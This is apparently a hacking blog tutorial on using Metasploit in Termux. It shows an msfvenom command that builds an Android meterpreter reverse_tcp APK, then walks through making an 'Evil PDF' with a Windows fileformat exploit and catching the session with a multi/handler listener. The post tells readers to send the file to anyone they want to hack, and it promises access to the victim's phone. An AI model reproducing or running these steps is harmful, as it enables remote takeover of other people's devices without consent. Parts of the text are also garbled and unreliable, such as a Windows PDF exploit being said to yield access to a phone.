Hi, friends. Welcome back! Today we will talk about How to create Metasploit Payload in Termux, but before starting this, look at my previous post, which is about Installing the Metasploit framework in Termux.


Before getting started, you should know about the meaning of Payload.


how to create a payload in metasploit using termux

👉 Don't miss Read also: 

What is Payload?


The Payload is a script, code, or module used to execute an attack against a vulnerability. Metasploit features have a massive assortment of payloads designed for every kind of eventualities; however, we will discuss those payloads another day.

What are the requirements for creating a payload in Termux?


  1. Android 5.0 above

  2. Download Termux Android App from Play Store

  3. Installed Metasploit Framework in Termux.

  4. An active Internet or WiFi Connection

  5. Termux should be allowed to use External Storage ( To allow use this command once: "termux-setup-storage ")


How to Create Metasploit Payload in Termux?


Before creating a payload, go to Metasploit framework directory by typing cd < your Metasploit framework directory name > and type msfconsole. You will see a screen like this.


To Create a Payload, write the command given below.


Note: Below command is used to make a payload for LAN Network only. This Payload will not work on the Internet.


msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R > /sdcard/hackmingtest.apk


In this command -p stands for Payload, LHOST & LPORT are LocalHOST & LocalPORT respectively, and in last we have given a path of our Payload in sdcard which is named as hackmingtest.apk. 


Let me show you a screenshot of my mobile phone.



Creating a Payload in Metasploit using Termux


As you can see hackmingtest.apk file has been created. Next process I will tell you in my next post how you can use this Payload for exploitation. See this how-to hack android phone on LAN using termux. I'm creating this post for the instructional purpose solely don't misuse this.


Note: Never install the .apk extension file from Unknown sources or websites. I strictly suggest you use Google Play Store for installing any android application.


Below I am sharing the Youtube Video of How to create Metasploit Payload in Termux? You will get more clarity. Just follow the steps.



Video Credits: ANONYMOUS PH


How to create pdf payload in Termux?


1:-  Launch Metasploit Console


So first, open Termux, whether you're on android, or if you're on Laptop, open your terminal. Enter the following code to open the Metasploit Console.


msfconsole


When this kind of screen occurs in front of you, then we're fine, and maybe there's an issue with the installation of Metasploit.


msfconsole

2:- Creating the Evil PDF (Payload)


Type the commands below or copy-paste them one by one to create a PDF format.


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs


Then you need to set up your local host. To do this, you will use your IP address to verify the type of your IP address.


ifconfig


In the latest termux session. Now go to your Metasploit console and set your localhost like this—


set LHOST 192.168.0.0


Replace the IP address defined in the above command with your IP address.


Now it's time to set up a port to join this command –


set LPORT 4444


You are free to use any port you choose, such as 4564, 8080, etc.


It's time to create the Evil PDF file. Do this by the order below –


set filename YourDocument.pdf


Here, you are free to use whatever name you wish. Just put it in front of MyDocument, but make sure to put it in.pdf at the end of your term.


The last order is now for the final development of the file. Do this by entering this order –


exploit


After a second, a message will be shown to show that your PDF file is being generated at any default location. Then copy the PDF file to the internal or external storage such as this one


mv <fille_location> <new_location>


And now you're done with the technical process of it. Send it to any guy you want to hack with. As soon as the PDF file is accessed, you'll get a Metasploit session.


3:- Exploitation


First, open your Metasploit console by typing


msfconsole


and then start writing below mentioned command –


use exploit/multi/handler/

set LHOST <your_IP>

set LPORT 4444

exploit

 

Exploitation

Note –  Make sure to enter the same IP and Port as you entered above in Step 2


It'll takes sometime, and then you'll get a meterpreter session. When this output happens, you will have access to the victim's phone.


If you like this post, please share this with your friends, and if you guys want to know more about hacking or programming kinds of stuff, E-mail me.


Subscribe to my Newsfeed to get the latest post updates.


Till Now, Good Bye and Take Care.